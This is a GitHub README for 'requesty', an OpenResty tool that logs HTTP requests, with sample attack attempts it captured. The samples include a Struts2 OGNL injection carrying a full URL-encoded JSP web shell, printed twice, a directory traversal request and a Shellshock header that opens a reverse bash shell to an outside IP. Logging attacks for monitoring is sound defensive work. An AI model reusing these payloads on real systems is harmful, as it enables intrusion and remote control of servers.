GitHub - c475/requesty: monitor/log http requests in a little more detail

Open resty app to capture HTTP requests in a little more detail. In this case it also echos it back to the client. Example:

GET:

$ curl "http://127.0.0.1/?hello=there&test=value" [{"date":"2016-04-25T00:06:02","method":"GET","args":{"hello":"there","test":"value"},"headers":{"host":"127.0.0.1","accept":"/","user-agent":"curl/7.35.0"}}]

POST:

[{ "date": "2016-04-25T00:06:02", "method": "GET", "headers": { "host": "127.0.0.1", "accept": "/", "user-agent": "curl/7.35.0" }, "args": { "test": "value", "hello": "there" } }, { "date": "2016-04-25T00:08:25", "method": "POST", "args": {}, "headers": { "host": "127.0.0.1", "accept": "/", "what": "Yep", "some": "Header", "user-agent": "curl/7.35.0" } }]

Notice how it keeps a journal of your requests (by IP). The redis key for this person (you) is 127.0.0.1 in DB 0.

It's pretty cool for monitoring web server or web app exploit attempts. Some samples:

Vanilla open proxy check:

{u'args': {}, u'date': u'2016-04-11T06:02:49', u'headers': {u'accept': u'text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8', u'accept-encoding': u'gzip, deflate', u'accept-language': u'pl,en-US;q=0.7,en;q=0.3', u'host': u'testp4.pospr.waw.pl', u'proxy-connection': u'Keep-Alive', u'user-agent': u'Mozilla/5.0 (Windows NT 5.1; rv:32.0) Gecko/20100101 Firefox/31.0'}, u'method': u'GET'}

OpenSymphony exploit attempt:

{u'args': {}, u'body': u"redirect:${%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23res%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23res.getWriter().println(%22okokok%22),%23res.getWriter().flush(),%23res.getWriter().close(),new+java.io.BufferedWriter(new+java.io.FileWriter(%23req.getRealPath(%22/%22)%2b%22tst.jsp%22)).append(%23req.getParameter(%22shell%22)).close()}&shell=%3C%25%40page%20import%3D%22java.io.%2Cjava.util.%2Cjava.net.%2Cjava.sql.%2Cjava.text.%22%25%3E%0D%0A%3C%25!%0D%0AString%20Pwd%3D%22chopper%22%3B%0D%0AString%20EC(String%20s%2CString%20c)throws%20Exception%7Breturn%20s%3B%7D%2F%2Fnew%20String(s.getBytes(%22ISO-8859-1%22)%2Cc)%3B%7D%0D%0AConnection%20GC(String%20s)throws%20Exception%7BString%5B%5D%20x%3Ds.trim().split(%22%5Cr%5Cn%22)%3BClass.forName(x%5B0%5D.trim()).newInstance()%3B%0D%0AConnection%20c%3DDriverManager.getConnection(x%5B1%5D.trim())%3Bif(x.length%3E2)%7Bc.setCatalog(x%5B2%5D.trim())%3B%7Dreturn%20c%3B%7D%0D%0Avoid%20AA(StringBuffer%20sb)throws%20Exception%7BFile%20r%5B%5D%3DFile.listRoots()%3Bfor(int%20i%3D0%3Bi%3Cr.length%3Bi%2B%2B)%7Bsb.append(r%5Bi%5D.toString().substring(0%2C2))%3B%7D%7D%0D%0Avoid%20BB(String%20s%2CStringBuffer%20sb)throws%20Exception%7BFile%20oF%3Dnew%20File(s)%2Cl%5B%5D%3DoF.listFiles()%3BString%20sT%2C%20sQ%2CsF%3D%22%22%3Bjava.util.Date%20dt%3B%0D%0ASimpleDateFormat%20fm%3Dnew%20SimpleDateFormat(%22yyyy-MM-dd%20HH%3Amm%3Ass%22)%3Bfor(int%20i%3D0%3Bi%3Cl.length%3Bi%2B%2B)%7Bdt%3Dnew%20java.util.Date(l%5Bi%5D.lastModified())%3B%0D%0AsT%3Dfm.format(dt)%3BsQ%3Dl%5Bi%5D.canRead()%3F%22R%22%3A%22%22%3BsQ%2B%3Dl%5Bi%5D.canWrite()%3F%22%20W%22%3A%22%22%3Bif(l%5Bi%5D.isDirectory())%7Bsb.append(l%5Bi%5D.getName()%2B%22%2F%5Ct%22%2BsT%2B%22%5Ct%22%2Bl%5Bi%5D.length()%2B%22%5Ct%22%2BsQ%2B%22%5Cn%22)%3B%7D%0D%0Aelse%7BsF%2B%3Dl%5Bi%5D.getName()%2B%22%5Ct%22%2BsT%2B%22%5Ct%22%2Bl%5Bi%5D.length()%2B%22%5Ct%22%2BsQ%2B%22%5Cn%22%3B%7D%7Dsb.append(sF)%3B%7D%0D%0Avoid%20EE(String%20s)throws%20Exception%7BFile%20f%3Dnew%20File(s)%3Bif(f.isDirectory())%7BFile%20x%5B%5D%3Df.listFiles()%3B%0D%0Afor(int%20k%3D0%3Bk%3Cx.length%3Bk%2B%2B)%7Bif(!x%5Bk%5D.delete())%7BEE(x%5Bk%5D.getPath())%3B%7D%7D%7Df.delete()%3B%7D%0D%0Avoid%20FF(String%20s%2CHttpServletResponse%20r)throws%20Exception%7Bint%20n%3Bbyte%5B%5D%20b%3Dnew%20byte%5B512%5D%3Br.reset()%3B%0D%0AServletOutputStream%20os%3Dr.getOutputStream()%3BBufferedInputStream%20is%3Dnew%20BufferedInputStream(new%20FileInputStream(s))%3B%0D%0Aos.write((%22-%3E%22%2B%22%7C%22).getBytes()%2C0%2C3)%3Bwhile((n%3Dis.read(b%2C0%2C512))!%3D-1)%7Bos.write(b%2C0%2Cn)%3B%7Dos.write((%22%7C%22%2B%22%3C-%22).getBytes()%2C0%2C3)%3Bos.close()%3Bis.close()%3B%7D%0D%0Avoid%20GG(String%20s%2C%20String%20d)throws%20Exception%7BString%20h%3D%220123456789ABCDEF%22%3Bint%20n%3BFile%20f%3Dnew%20File(s)%3Bf.createNewFile()%3B%0D%0AFileOutputStream%20os%3Dnew%20FileOutputStream(f)%3Bfor(int%20i%3D0%3Bi%3Cd.length()%3Bi%2B%3D2)%0D%0A%7Bos.write((h.indexOf(d.charAt(i))%3C%3C4%7Ch.indexOf(d.charAt(i%2B1))))%3B%7Dos.close()%3B%7D%0D%0Avoid%20HH(String%20s%2CString%20d)throws%20Exception%7BFile%20sf%3Dnew%20File(s)%2Cdf%3Dnew%20File(d)%3Bif(sf.isDirectory())%7Bif(!df.exists())%7Bdf.mkdir()%3B%7DFile%20z%5B%5D%3Dsf.listFiles()%3B%0D%0Afor(int%20j%3D0%3Bj%3Cz.length%3Bj%2B%2B)%7BHH(s%2B%22%2F%22%2Bz%5Bj%5D.getName()%2Cd%2B%22%2F%22%2Bz%5Bj%5D.getName())%3B%7D%0D%0A%7Delse%7BFileInputStream%20is%3Dnew%20FileInputStream(sf)%3BFileOutputStream%20os%3Dnew%20FileOutputStream(df)%3B%0D%0Aint%20n%3Bbyte%5B%5D%20b%3Dnew%20byte%5B512%5D%3Bwhile((n%3Dis.read(b%2C0%2C512))!%3D-1)%7Bos.write(b%2C0%2Cn)%3B%7Dis.close()%3Bos.close()%3B%7D%7D%0D%0Avoid%20II(String%20s%2CString%20d)throws%20Exception%7BFile%20sf%3Dnew%20File(s)%2Cdf%3Dnew%20File(d)%3Bsf.renameTo(df)%3B%7Dvoid%20JJ(String%20s)throws%20Exception%7BFile%20f%3Dnew%20File(s)%3Bf.mkdir()%3B%7D%0D%0Avoid%20KK(String%20s%2CString%20t)throws%20Exception%7BFile%20f%3Dnew%20File(s)%3BSimpleDateFormat%20fm%3Dnew%20SimpleDateFormat(%22yyyy-MM-dd%20HH%3Amm%3Ass%22)%3B%0D%0Ajava.util.Date%20dt%3Dfm.parse(t)%3Bf.setLastModified(dt.getTime())%3B%7D%0D%0Avoid%20LL(String%20s%2C%20String%20d)throws%20Exception%7BURL%20u%3Dnew%20URL(s)%3Bint%20n%3BFileOutputStream%20os%3Dnew%20FileOutputStream(d)%3B%0D%0AHttpURLConnection%20h%3D(HttpURLConnection)u.openConnection()%3BInputStream%20is%3Dh.getInputStream()%3Bbyte%5B%5D%20b%3Dnew%20byte%5B512%5D%3B%0D%0Awhile((n%3Dis.read(b%2C0%2C512))!%3D-1)%7Bos.write(b%2C0%2Cn)%3B%7Dos.close()%3Bis.close()%3Bh.disconnect()%3B%7D%0D%0Avoid%20MM(InputStream%20is%2C%20StringBuffer%20sb)throws%20Exception%7BString%20l%3BBufferedReader%20br%3Dnew%20BufferedReader(new%20InputStreamReader(is))%3B%0D%0Awhile((l%3Dbr.readLine())!%3Dnull)%7Bsb.append(l%2B%22%5Cr%5Cn%22)%3B%7D%7D%0D%0Avoid%20NN(String%20s%2CStringBuffer%20sb)throws%20Exception%7BConnection%20c%3DGC(s)%3BResultSet%20r%3Dc.getMetaData().getCatalogs()%3B%0D%0Awhile(r.next())%7Bsb.append(r.getString(1)%2B%22%5Ct%22)%3B%7Dr.close()%3Bc.close()%3B%7D%0D%0Avoid%20OO(String%20s%2CStringBuffer%20sb)throws%20Exception%7BConnection%20c%3DGC(s)%3BString%5B%5D%20t%3D%7B%22TABLE%22%7D%3BResultSet%20r%3Dc.getMetaData().getTables%20(null%2Cnull%2C%22%25%22%2Ct)%3B%0D%0Awhile(r.next())%7Bsb.append(r.getString(%22TABLE_NAME%22)%2B%22%5Ct%22)%3B%7Dr.close()%3Bc.close()%3B%7D%0D%0Avoid%20PP(String%20s%2CStringBuffer%20sb)throws%20Exception%7BString%5B%5D%20x%3Ds.trim().split(%22%5Cr%5Cn%22)%3BConnection%20c%3DGC(s)%3B%0D%0AStatement%20m%3Dc.createStatement(1005%2C1007)%3BResultSet%20r%3Dm.executeQuery(%22select%20%20from%20%22%2Bx%5B3%5D)%3BResultSetMetaData%20d%3Dr.getMetaData()%3B%0D%0Afor(int%20i%3D1%3Bi%3C%3Dd.getColumnCount()%3Bi%2B%2B)%7Bsb.append(d.getColumnName(i)%2B%22%20(%22%2Bd.getColumnTypeName(i)%2B%22)%5Ct%22)%3B%7Dr.close()%3Bm.close()%3Bc.close()%3B%7D%0D%0Avoid%20QQ(String%20cs%2CString%20s%2CString%20q%2CStringBuffer%20sb)throws%20Exception%7Bint%20i%3BConnection%20c%3DGC(s)%3BStatement%20m%3Dc.createStatement(1005%2C1008)%3B%0D%0Atry%7BResultSet%20r%3Dm.executeQuery(q)%3BResultSetMetaData%20d%3Dr.getMetaData()%3Bint%20n%3Dd.getColumnCount()%3Bfor(i%3D1%3Bi%3C%3Dn%3Bi%2B%2B)%7Bsb.append(d.getColumnName(i)%2B%22%5Ct%7C%5Ct%22)%3B%0D%0A%7Dsb.append(%22%5Cr%5Cn%22)%3Bwhile(r.next())%7Bfor(i%3D1%3Bi%3C%3Dn%3Bi%2B%2B)%7Bsb.append(EC(r.getString(i)%2Ccs)%2B%22%5Ct%7C%5Ct%22)%3B%7Dsb.append(%22%5Cr%5Cn%22)%3B%7Dr.close()%3B%7D%0D%0Acatch(Exception%20e)%7Bsb.append(%22Result%5Ct%7C%5Ct%5Cr%5Cn%22)%3Btry%7Bm.executeUpdate(q)%3Bsb.append(%22Execute%20Successfully!%5Ct%7C%5Ct%5Cr%5Cn%22)%3B%0D%0A%7Dcatch(Exception%20ee)%7Bsb.append(ee.toString()%2B%22%5Ct%7C%5Ct%5Cr%5Cn%22)%3B%7D%7Dm.close()%3Bc.close()%3B%7D%0D%0A%25%3E%3C%25%0D%0AString%20cs%3Drequest.getParameter(%22z0%22)%2B%22%22%3Brequest.setCharacterEncoding(cs)%3Bresponse.setContentType(%22text%2Fhtml%3Bcharset%3D%22%2Bcs)%3B%0D%0AString%20Z%3DEC(request.getParameter(Pwd)%2B%22%22%2Ccs)%3BString%20z1%3DEC(request.getParameter(%22z1%22)%2B%22%22%2Ccs)%3BString%20z2%3DEC(request.getParameter(%22z2%22)%2B%22%22%2Ccs)%3B%0D%0AStringBuffer%20sb%3Dnew%20StringBuffer(%22%22)%3Btry%7Bsb.append(%22-%3E%22%2B%22%7C%22)%3B%0D%0Aif(Z.equals(%22A%22))%7BString%20s%3Dnew%20File(application.getRealPath(request.getRequestURI())).getParent()%3Bsb.append(s%2B%22%5Ct%22)%3Bif(!s.substring(0%2C1).equals(%22%2F%22))%7BAA(sb)%3B%7D%7D%0D%0Aelse%20if(Z.equals(%22B%22))%7BBB(z1%2Csb)%3B%7Delse%20if(Z.equals(%22C%22))%7BString%20l%3D%22%22%3BBufferedReader%20br%3Dnew%20BufferedReader(new%20InputStreamReader(new%20FileInputStream(new%20File(z1))))%3B%0D%0Awhile((l%3Dbr.readLine())!%3Dnull)%7Bsb.append(l%2B%22%5Cr%5Cn%22)%3B%7Dbr.close()%3B%7D%0D%0Aelse%20if(Z.equals(%22D%22))%7BBufferedWriter%20bw%3Dnew%20BufferedWriter(new%20OutputStreamWriter(new%20FileOutputStream(new%20File(z1))))%3B%0D%0Abw.write(z2)%3Bbw.close()%3Bsb.append(%221%22)%3B%7Delse%20if(Z.equals(%22E%22))%7BEE(z1)%3Bsb.append(%221%22)%3B%7Delse%20if(Z.equals(%22F%22))%7BFF(z1%2Cresponse)%3B%7D%0D%0Aelse%20if(Z.equals(%22G%22))%7BGG(z1%2Cz2)%3Bsb.append(%221%22)%3B%7Delse%20if(Z.equals(%22H%22))%7BHH(z1%2Cz2)%3Bsb.append(%221%22)%3B%7Delse%20if(Z.equals(%22I%22))%7BII(z1%2Cz2)%3Bsb.append(%221%22)%3B%7D%0D%0Aelse%20if(Z.equals(%22J%22))%7BJJ(z1)%3Bsb.append(%221%22)%3B%7Delse%20if(Z.equals(%22K%22))%7BKK(z1%2Cz2)%3Bsb.append(%221%22)%3B%7Delse%20if(Z.equals(%22L%22))%7BLL(z1%2Cz2)%3Bsb.append(%221%22)%3B%7D%0D%0Aelse%20if(Z.equals(%22M%22))%7BString%5B%5D%20c%3D%7Bz1.substring(2)%2Cz1.substring(0%2C2)%2Cz2%7D%3BProcess%20p%3DRuntime.getRuntime().exec(c)%3B%0D%0AMM(p.getInputStream()%2Csb)%3BMM(p.getErrorStream()%2Csb)%3B%7Delse%20if(Z.equals(%22N%22))%7BNN(z1%2Csb)%3B%7Delse%20if(Z.equals(%22O%22))%7BOO(z1%2Csb)%3B%7D%0D%0Aelse%20if(Z.equals(%22P%22))%7BPP(z1%2Csb)%3B%7Delse%20if(Z.equals(%22Q%22))%7BQQ(cs%2Cz1%2Cz2%2Csb)%3B%7D%0D%0A%7Dcatch(Exception%20e)%7Bsb.append(%22ERROR%22%2B%22%3A%2F%2F%20%22%2Be.toString())%3B%7Dsb.append(%22%7C%22%2B%22%3C-%22)%3Bout.print(sb.toString())%3B%0D%0A%25%3E", u'date': u'2016-04-18T09:15:51', u'headers': {u'accept': u'/', u'content-length': u'9069', u'content-type': u'application/x-www-form-urlencoded', u'expect': u'100-continue', u'host': u'REDACTED', u'user-agent': u'Mozilla/5.0'}, u'method': u'POST', u'rawbody': u"redirect:${%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23res%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23res.getWriter().println(%22okokok%22),%23res.getWriter().flush(),%23res.getWriter().close(),new+java.io.BufferedWriter(new+java.io.FileWriter(%23req.getRealPath(%22/%22)%2b%22tst.jsp%22)).append(%23req.getParameter(%22shell%22)).close()}&shell=%3C%25%40page%20import%3D%22java.io.%2Cjava.util.%2Cjava.net.%2Cjava.sql.%2Cjava.text.%22%25%3E%0D%0A%3C%25!%0D%0AString%20Pwd%3D%22chopper%22%3B%0D%0AString%20EC(String%20s%2CString%20c)throws%20Exception%7Breturn%20s%3B%7D%2F%2Fnew%20String(s.getBytes(%22ISO-8859-1%22)%2Cc)%3B%7D%0D%0AConnection%20GC(String%20s)throws%20Exception%7BString%5B%5D%20x%3Ds.trim().split(%22%5Cr%5Cn%22)%3BClass.forName(x%5B0%5D.trim()).newInstance()%3B%0D%0AConnection%20c%3DDriverManager.getConnection(x%5B1%5D.trim())%3Bif(x.length%3E2)%7Bc.setCatalog(x%5B2%5D.trim())%3B%7Dreturn%20c%3B%7D%0D%0Avoid%20AA(StringBuffer%20sb)throws%20Exception%7BFile%20r%5B%5D%3DFile.listRoots()%3Bfor(int%20i%3D0%3Bi%3Cr.length%3Bi%2B%2B)%7Bsb.append(r%5Bi%5D.toString().substring(0%2C2))%3B%7D%7D%0D%0Avoid%20BB(String%20s%2CStringBuffer%20sb)throws%20Exception%7BFile%20oF%3Dnew%20File(s)%2Cl%5B%5D%3DoF.listFiles()%3BString%20sT%2C%20sQ%2CsF%3D%22%22%3Bjava.util.Date%20dt%3B%0D%0ASimpleDateFormat%20fm%3Dnew%20SimpleDateFormat(%22yyyy-MM-dd%20HH%3Amm%3Ass%22)%3Bfor(int%20i%3D0%3Bi%3Cl.length%3Bi%2B%2B)%7Bdt%3Dnew%20java.util.Date(l%5Bi%5D.lastModified())%3B%0D%0AsT%3Dfm.format(dt)%3BsQ%3Dl%5Bi%5D.canRead()%3F%22R%22%3A%22%22%3BsQ%2B%3Dl%5Bi%5D.canWrite()%3F%22%20W%22%3A%22%22%3Bif(l%5Bi%5D.isDirectory())%7Bsb.append(l%5Bi%5D.getName()%2B%22%2F%5Ct%22%2BsT%2B%22%5Ct%22%2Bl%5Bi%5D.length()%2B%22%5Ct%22%2BsQ%2B%22%5Cn%22)%3B%7D%0D%0Aelse%7BsF%2B%3Dl%5Bi%5D.getName()%2B%22%5Ct%22%2BsT%2B%22%5Ct%22%2Bl%5Bi%5D.length()%2B%22%5Ct%22%2BsQ%2B%22%5Cn%22%3B%7D%7Dsb.append(sF)%3B%7D%0D%0Avoid%20EE(String%20s)throws%20Exception%7BFile%20f%3Dnew%20File(s)%3Bif(f.isDirectory())%7BFile%20x%5B%5D%3Df.listFiles()%3B%0D%0Afor(int%20k%3D0%3Bk%3Cx.length%3Bk%2B%2B)%7Bif(!x%5Bk%5D.delete())%7BEE(x%5Bk%5D.getPath())%3B%7D%7D%7Df.delete()%3B%7D%0D%0Avoid%20FF(String%20s%2CHttpServletResponse%20r)throws%20Exception%7Bint%20n%3Bbyte%5B%5D%20b%3Dnew%20byte%5B512%5D%3Br.reset()%3B%0D%0AServletOutputStream%20os%3Dr.getOutputStream()%3BBufferedInputStream%20is%3Dnew%20BufferedInputStream(new%20FileInputStream(s))%3B%0D%0Aos.write((%22-%3E%22%2B%22%7C%22).getBytes()%2C0%2C3)%3Bwhile((n%3Dis.read(b%2C0%2C512))!%3D-1)%7Bos.write(b%2C0%2Cn)%3B%7Dos.write((%22%7C%22%2B%22%3C-%22).getBytes()%2C0%2C3)%3Bos.close()%3Bis.close()%3B%7D%0D%0Avoid%20GG(String%20s%2C%20String%20d)throws%20Exception%7BString%20h%3D%220123456789ABCDEF%22%3Bint%20n%3BFile%20f%3Dnew%20File(s)%3Bf.createNewFile()%3B%0D%0AFileOutputStream%20os%3Dnew%20FileOutputStream(f)%3Bfor(int%20i%3D0%3Bi%3Cd.length()%3Bi%2B%3D2)%0D%0A%7Bos.write((h.indexOf(d.charAt(i))%3C%3C4%7Ch.indexOf(d.charAt(i%2B1))))%3B%7Dos.close()%3B%7D%0D%0Avoid%20HH(String%20s%2CString%20d)throws%20Exception%7BFile%20sf%3Dnew%20File(s)%2Cdf%3Dnew%20File(d)%3Bif(sf.isDirectory())%7Bif(!df.exists())%7Bdf.mkdir()%3B%7DFile%20z%5B%5D%3Dsf.listFiles()%3B%0D%0Afor(int%20j%3D0%3Bj%3Cz.length%3Bj%2B%2B)%7BHH(s%2B%22%2F%22%2Bz%5Bj%5D.getName()%2Cd%2B%22%2F%22%2Bz%5Bj%5D.getName())%3B%7D%0D%0A%7Delse%7BFileInputStream%20is%3Dnew%20FileInputStream(sf)%3BFileOutputStream%20os%3Dnew%20FileOutputStream(df)%3B%0D%0Aint%20n%3Bbyte%5B%5D%20b%3Dnew%20byte%5B512%5D%3Bwhile((n%3Dis.read(b%2C0%2C512))!%3D-1)%7Bos.write(b%2C0%2Cn)%3B%7Dis.close()%3Bos.close()%3B%7D%7D%0D%0Avoid%20II(String%20s%2CString%20d)throws%20Exception%7BFile%20sf%3Dnew%20File(s)%2Cdf%3Dnew%20File(d)%3Bsf.renameTo(df)%3B%7Dvoid%20JJ(String%20s)throws%20Exception%7BFile%20f%3Dnew%20File(s)%3Bf.mkdir()%3B%7D%0D%0Avoid%20KK(String%20s%2CString%20t)throws%20Exception%7BFile%20f%3Dnew%20File(s)%3BSimpleDateFormat%20fm%3Dnew%20SimpleDateFormat(%22yyyy-MM-dd%20HH%3Amm%3Ass%22)%3B%0D%0Ajava.util.Date%20dt%3Dfm.parse(t)%3Bf.setLastModified(dt.getTime())%3B%7D%0D%0Avoid%20LL(String%20s%2C%20String%20d)throws%20Exception%7BURL%20u%3Dnew%20URL(s)%3Bint%20n%3BFileOutputStream%20os%3Dnew%20FileOutputStream(d)%3B%0D%0AHttpURLConnection%20h%3D(HttpURLConnection)u.openConnection()%3BInputStream%20is%3Dh.getInputStream()%3Bbyte%5B%5D%20b%3Dnew%20byte%5B512%5D%3B%0D%0Awhile((n%3Dis.read(b%2C0%2C512))!%3D-1)%7Bos.write(b%2C0%2Cn)%3B%7Dos.close()%3Bis.close()%3Bh.disconnect()%3B%7D%0D%0Avoid%20MM(InputStream%20is%2C%20StringBuffer%20sb)throws%20Exception%7BString%20l%3BBufferedReader%20br%3Dnew%20BufferedReader(new%20InputStreamReader(is))%3B%0D%0Awhile((l%3Dbr.readLine())!%3Dnull)%7Bsb.append(l%2B%22%5Cr%5Cn%22)%3B%7D%7D%0D%0Avoid%20NN(String%20s%2CStringBuffer%20sb)throws%20Exception%7BConnection%20c%3DGC(s)%3BResultSet%20r%3Dc.getMetaData().getCatalogs()%3B%0D%0Awhile(r.next())%7Bsb.append(r.getString(1)%2B%22%5Ct%22)%3B%7Dr.close()%3Bc.close()%3B%7D%0D%0Avoid%20OO(String%20s%2CStringBuffer%20sb)throws%20Exception%7BConnection%20c%3DGC(s)%3BString%5B%5D%20t%3D%7B%22TABLE%22%7D%3BResultSet%20r%3Dc.getMetaData().getTables%20(null%2Cnull%2C%22%25%22%2Ct)%3B%0D%0Awhile(r.next())%7Bsb.append(r.getString(%22TABLE_NAME%22)%2B%22%5Ct%22)%3B%7Dr.close()%3Bc.close()%3B%7D%0D%0Avoid%20PP(String%20s%2CStringBuffer%20sb)throws%20Exception%7BString%5B%5D%20x%3Ds.trim().split(%22%5Cr%5Cn%22)%3BConnection%20c%3DGC(s)%3B%0D%0AStatement%20m%3Dc.createStatement(1005%2C1007)%3BResultSet%20r%3Dm.executeQuery(%22select%20%20from%20%22%2Bx%5B3%5D)%3BResultSetMetaData%20d%3Dr.getMetaData()%3B%0D%0Afor(int%20i%3D1%3Bi%3C%3Dd.getColumnCount()%3Bi%2B%2B)%7Bsb.append(d.getColumnName(i)%2B%22%20(%22%2Bd.getColumnTypeName(i)%2B%22)%5Ct%22)%3B%7Dr.close()%3Bm.close()%3Bc.close()%3B%7D%0D%0Avoid%20QQ(String%20cs%2CString%20s%2CString%20q%2CStringBuffer%20sb)throws%20Exception%7Bint%20i%3BConnection%20c%3DGC(s)%3BStatement%20m%3Dc.createStatement(1005%2C1008)%3B%0D%0Atry%7BResultSet%20r%3Dm.executeQuery(q)%3BResultSetMetaData%20d%3Dr.getMetaData()%3Bint%20n%3Dd.getColumnCount()%3Bfor(i%3D1%3Bi%3C%3Dn%3Bi%2B%2B)%7Bsb.append(d.getColumnName(i)%2B%22%5Ct%7C%5Ct%22)%3B%0D%0A%7Dsb.append(%22%5Cr%5Cn%22)%3Bwhile(r.next())%7Bfor(i%3D1%3Bi%3C%3Dn%3Bi%2B%2B)%7Bsb.append(EC(r.getString(i)%2Ccs)%2B%22%5Ct%7C%5Ct%22)%3B%7Dsb.append(%22%5Cr%5Cn%22)%3B%7Dr.close()%3B%7D%0D%0Acatch(Exception%20e)%7Bsb.append(%22Result%5Ct%7C%5Ct%5Cr%5Cn%22)%3Btry%7Bm.executeUpdate(q)%3Bsb.append(%22Execute%20Successfully!%5Ct%7C%5Ct%5Cr%5Cn%22)%3B%0D%0A%7Dcatch(Exception%20ee)%7Bsb.append(ee.toString()%2B%22%5Ct%7C%5Ct%5Cr%5Cn%22)%3B%7D%7Dm.close()%3Bc.close()%3B%7D%0D%0A%25%3E%3C%25%0D%0AString%20cs%3Drequest.getParameter(%22z0%22)%2B%22%22%3Brequest.setCharacterEncoding(cs)%3Bresponse.setContentType(%22text%2Fhtml%3Bcharset%3D%22%2Bcs)%3B%0D%0AString%20Z%3DEC(request.getParameter(Pwd)%2B%22%22%2Ccs)%3BString%20z1%3DEC(request.getParameter(%22z1%22)%2B%22%22%2Ccs)%3BString%20z2%3DEC(request.getParameter(%22z2%22)%2B%22%22%2Ccs)%3B%0D%0AStringBuffer%20sb%3Dnew%20StringBuffer(%22%22)%3Btry%7Bsb.append(%22-%3E%22%2B%22%7C%22)%3B%0D%0Aif(Z.equals(%22A%22))%7BString%20s%3Dnew%20File(application.getRealPath(request.getRequestURI())).getParent()%3Bsb.append(s%2B%22%5Ct%22)%3Bif(!s.substring(0%2C1).equals(%22%2F%22))%7BAA(sb)%3B%7D%7D%0D%0Aelse%20if(Z.equals(%22B%22))%7BBB(z1%2Csb)%3B%7Delse%20if(Z.equals(%22C%22))%7BString%20l%3D%22%22%3BBufferedReader%20br%3Dnew%20BufferedReader(new%20InputStreamReader(new%20FileInputStream(new%20File(z1))))%3B%0D%0Awhile((l%3Dbr.readLine())!%3Dnull)%7Bsb.append(l%2B%22%5Cr%5Cn%22)%3B%7Dbr.close()%3B%7D%0D%0Aelse%20if(Z.equals(%22D%22))%7BBufferedWriter%20bw%3Dnew%20BufferedWriter(new%20OutputStreamWriter(new%20FileOutputStream(new%20File(z1))))%3B%0D%0Abw.write(z2)%3Bbw.close()%3Bsb.append(%221%22)%3B%7Delse%20if(Z.equals(%22E%22))%7BEE(z1)%3Bsb.append(%221%22)%3B%7Delse%20if(Z.equals(%22F%22))%7BFF(z1%2Cresponse)%3B%7D%0D%0Aelse%20if(Z.equals(%22G%22))%7BGG(z1%2Cz2)%3Bsb.append(%221%22)%3B%7Delse%20if(Z.equals(%22H%22))%7BHH(z1%2Cz2)%3Bsb.append(%221%22)%3B%7Delse%20if(Z.equals(%22I%22))%7BII(z1%2Cz2)%3Bsb.append(%221%22)%3B%7D%0D%0Aelse%20if(Z.equals(%22J%22))%7BJJ(z1)%3Bsb.append(%221%22)%3B%7Delse%20if(Z.equals(%22K%22))%7BKK(z1%2Cz2)%3Bsb.append(%221%22)%3B%7Delse%20if(Z.equals(%22L%22))%7BLL(z1%2Cz2)%3Bsb.append(%221%22)%3B%7D%0D%0Aelse%20if(Z.equals(%22M%22))%7BString%5B%5D%20c%3D%7Bz1.substring(2)%2Cz1.substring(0%2C2)%2Cz2%7D%3BProcess%20p%3DRuntime.getRuntime().exec(c)%3B%0D%0AMM(p.getInputStream()%2Csb)%3BMM(p.getErrorStream()%2Csb)%3B%7Delse%20if(Z.equals(%22N%22))%7BNN(z1%2Csb)%3B%7Delse%20if(Z.equals(%22O%22))%7BOO(z1%2Csb)%3B%7D%0D%0Aelse%20if(Z.equals(%22P%22))%7BPP(z1%2Csb)%3B%7Delse%20if(Z.equals(%22Q%22))%7BQQ(cs%2Cz1%2Cz2%2Csb)%3B%7D%0D%0A%7Dcatch(Exception%20e)%7Bsb.append(%22ERROR%22%2B%22%3A%2F%2F%20%22%2Be.toString())%3B%7Dsb.append(%22%7C%22%2B%22%3C-%22)%3Bout.print(sb.toString())%3B%0D%0A%25%3E"}

Directory traversal attack:

{u'args': {u'Action': u'View', u'Script': u'../../../../cnf/db.php'}, u'date': u'2016-04-10T143103', u'headers': {u'accept-encoding': u'gzip, deflate', u'host': u'REDACTED', u'user-agent': u'HTTP_Request2/0.5.2 (http://pear.php.net/package/http_request2) PHP/5.2.6-1+lenny9'}, u'method': u'GET'}

Huh? Interesting...

{u'args': {}, u'date': u'2016-04-22T05:37:24', u'headers': {u'user-agent': u'() { :; }; /bin/bash -i >& /dev/tcp/65.49.37.71/2311 0<&1 2>&1'}, u'method': u'GET'}

Mass scanning for basic auth pages, looking for HTTP 401 response:

{u'args': {}, u'date': u'2016-04-21T02:56:41', u'headers': {u'accept': u'text/html, /', u'authorization': u'Basic Og==', u'content-type': u'text/html', u'host': u'REDACTED', u'user-agent': u'Mozilla/3.0 (compatible; Indy Library)'}, u'method': u'GET'}

I'll write more later.

Name		Name	Last commit message	Last commit date
Latest commit History 55 Commits
config		config
README.md		README.md
cat.ico		cat.ico
favicon.lua		favicon.lua
hello.lua		hello.lua

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

Repository files navigation

About

Uh oh!

Releases

Packages

Languages

c475/requesty

Folders and files

Latest commit

History

Repository files navigation

About

Resources

Uh oh!

Stars

Watchers

Forks

Releases

Packages 0

Languages

Packages